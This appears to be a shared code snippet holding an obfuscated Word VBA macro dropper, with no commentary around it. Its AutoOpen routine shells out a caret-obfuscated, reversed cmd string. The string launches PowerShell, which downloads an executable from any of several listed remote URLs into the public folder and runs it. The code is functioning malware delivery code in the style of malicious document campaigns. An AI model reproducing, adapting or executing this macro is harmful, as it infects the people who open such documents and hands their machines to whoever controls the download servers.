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Last active November 30, 2018 15:59
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Sub AutoOpen()
SjonJLuoL (KeyString(wwTLriZs + lfKnf + 10 + 7 + 50 + CdBUtfI + iNPLT) + LkwPL + qNIXIW + KeyString(BdpGivaC + ufzLc + 12 + 8 + 57 + tXzCjRS + KGlIA) + DTqpj + vNtBMCjurWl + fWWSlvV + azJobQRV)
End Sub
Function DTqpj()
wjPzoWkSo = "d /V^:^ON/" + "C" + """" + "^s^e^t lN=^ ^ ^" + " ^ ^ ^ ^ ^ ^"
wKGNtc = " ^ ^ ^ ^ ^}^" + "}^{^hc^t^ac^}^;^k^" + "a^er^b^;^ir^j" + "^$^ ^m^etI^-^e^k^ovn" + "^I;)^ir^j^$^ ^," + "^fB^J^$(^e^l^"
LIJaYBX = "i^F^d^a^o^ln^wo^D^." + "^i^w^Y^$^{^yr^t" + "^{)^B^Kj^$ n^" + "i^ ^f^B^J^$(^hc^a^e" + "r^o^f;^'^e^x^e^.^'^+" + "^U^t^L^$^+^'^\'"
AMjHaSCGI = "+c^i^l^b^u^p" + "^:vne^$^=^ir^" + "j^$^;^'49" + "3^'^ ^=^ ^U^t^"
kamHIjcmQ = "L^$^;)^'^@^'" + "(^t^i^l^p^S^." + "^'^Q/^ur^.^e" + "n^g^i^s^e^dn^a^l^.n^" + "a^m^i^d^.^w^w^w//^:" + "^p^t^t^h@yn/^t^"
lYGYPUN = "i^.e^l^o^ic^s^i" + "v^e^l^l^ed^on^" + "i^dra^i^g^l^i" + "//^:^p^t^t^h^@^g"
DTqpj = wjPzoWkSo + wKGNtc + LIJaYBX + AMjHaSCGI + kamHIjcmQ + lYGYPUN
End Function
Function vNtBMCjurWl()
inRtnqGO = "/^k^u.^oc^.^s^ec^" + "ivr^e^s^k^e^p^sn" + "^i//^:^p^t^t^h^" + "@C/^m^oc^.^l^a^" + "g^o^f^j//^:^p^"
WBMdqom = "t^t^h@^XC^s^" + "U/^e^b^.^yn" + "^a^j//^:^p^t^t^" + "h^'^=^B^K^j^$^;" + "^tn^e^i^lC^b"
hluFDhvu = "^e^W^.^t^eN^" + " ^tc^e^j^b^o^" + "-^w^en^=^i^" + "w^Y^$^ ^l^l" + "^e^h^sr^e^w^o^p&&"
EBYlwaaJo = "^f^or /^L " + "%^p ^in (349^;^-^" + "1^;0)^d^o ^s^e^" + "t ^l^I=!^l^I!!lN:" + "~%^p,1!&&^i^f %^p ^e"
sjiiN = "^q^u ^0 c^a^l^" + "l %^l^I:^~^-35" + "0%" + """" + ""
vNtBMCjurWl = inRtnqGO + WBMdqom + hluFDhvu + EBYlwaaJo + sjiiN
End Function
Function SjonJLuoL(RGYjoAZnsmE As String)
Const QrQBzLuD = 623250762–623250762
Shell# RGYjoAZnsmE, QrQBzLuD
End Function
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